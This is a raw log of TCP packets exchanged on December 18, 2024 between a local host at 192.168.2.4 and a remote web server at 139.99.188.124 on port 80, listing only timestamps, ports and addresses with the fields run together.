                                                                              Dec 18, 2024 21:00:36.336848021 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.336909056 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.338608027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.338625908 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.338665962 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.340406895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340425014 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340440035 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.340481997 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.340528011 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.342211962 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.342228889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.342278004 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.343928099 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.343946934 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.344013929 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.345890045 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.345907927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.346044064 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.347645998 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.347662926 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.347711086 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.349273920 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.349289894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.349345922 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.349391937 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351278067 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351294041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.351423025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.352991104 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.353008986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.353060961 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.354669094 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.354686022 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.354717016 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.356477022 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356493950 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356508970 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.356544018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.356590986 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.358253002 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.358273983 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.358350039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.360004902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.360022068 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.360078096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.361887932 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.361905098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.361974955 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.364891052 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.364907980 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.364978075 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.365309000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365324974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365339994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.365386963 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.367321968 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.367341995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.367391109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.369096994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.369121075 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.369168043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.370748997 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.370765924 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.370811939 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.372464895 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372481108 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372494936 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.372529030 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.372566938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.374840975 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.374857903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.375008106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.376045942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.376061916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.376120090 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.377810001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.377826929 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.377931118 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.380068064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.380084038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.380222082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.382210016 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382225990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382244110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.382277012 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.383173943 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.383188963 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.383375883 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.385312080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.385329008 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.385417938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.493455887 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.493482113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.493535995 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.494215965 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495026112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495050907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.495064020 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.496714115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.496732950 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.496756077 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.498264074 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.498282909 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.498327017 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.499888897 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.499907017 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.499957085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.501677036 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.501696110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.501748085 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.503365993 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.503384113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.503421068 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.504853010 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.504869938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.504949093 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.506665945 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.506681919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.506705046 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.508543015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.508559942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.508589983 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.510246038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510265112 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510282040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.510313988 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.510339975 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.511982918 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.512001038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.512037992 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.513850927 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.513869047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.513917923 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.515443087 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.515477896 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.515516043 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.517318964 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517337084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517353058 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.517389059 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.519184113 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.519201994 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.519228935 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.520926952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.520944118 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.520975113 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.522653103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.522670984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.522701025 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.524532080 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.524550915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.524579048 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.526263952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526282072 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526299000 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.526307106 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.526336908 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.528110981 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.528136015 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.528223991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.529874086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.529892921 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.529948950 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.531675100 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.531692982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.531749964 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.533612967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533629894 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533644915 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.533669949 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.535217047 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.535233974 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.535285950 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.537430048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.537448883 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.537475109 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.538835049 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.538851976 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.538873911 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.540513992 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.540533066 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.540559053 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.542226076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542243958 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542258978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.542268991 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.542298079 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.544105053 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.891808987 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.891856909 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.893420935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.893455982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.893503904 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.895221949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895354033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895494938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.895740986 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895776033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895808935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.895833015 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.896083117 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.896119118 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.896172047 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.897841930 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.897876978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.897896051 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.899637938 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.899673939 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.899688005 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.901468039 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901504040 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901536942 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.901554108 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.901578903 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.903398991 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.903434038 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.903506994 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.905056953 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.905092001 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.905148029 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.906877995 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.906914949 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.907140017 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.908493042 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.908528090 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.908581018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.910336018 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910371065 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910403967 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.910418987 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.912058115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.912091970 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.912103891 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.913870096 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.913903952 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.913918018 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.915652990 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.915687084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.915705919 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.917404890 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917449951 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.917458057 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917490959 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.917536974 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.919186115 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.919222116 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.919276953 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.920981884 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.921015978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.921065092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.922852993 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.922945023 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.922986031 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.924570084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.924606085 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.924654007 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.926462889 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926497936 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926531076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.926542044 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.928139925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.928174973 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.928226948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.929979086 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.930016041 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.930028915 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.931632996 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.931682110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.931685925 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933799028 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933834076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933849096 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.933867931 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.933912039 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.935246944 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.935286999 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.935400009 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.937256098 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.937290907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.937330008 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.938997984 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.939033031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.939080954 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.940527916 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.940613031 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.940658092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.942439079 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942472935 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942507029 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.942569971 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.944212914 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.944247007 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.944302082 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.945938110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.945972919 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.946028948 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.947869062 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.947904110 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.947961092 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.949500084 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949534893 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949549913 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.949568033 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.949624062 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.951284885 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.951335907 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.951534033 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.953160048 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.953193903 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.953241110 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.954986095 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.955019951 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.955065966 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.956703901 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.956739902 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.956775904 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.958518982 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958553076 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958585978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.958591938 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.960237026 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.960273027 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.960285902 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.962330103 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:36.962393999 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:36.962404966 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070342064 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070419073 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.070424080 CET4975380192.168.2.4139.99.188.124
                                                                              Dec 18, 2024 21:00:37.071301937 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.071331978 CET8049753139.99.188.124192.168.2.4
                                                                              Dec 18, 2024 21:00:37.071348906 CET4975380192.168.2.4139.99.188.124
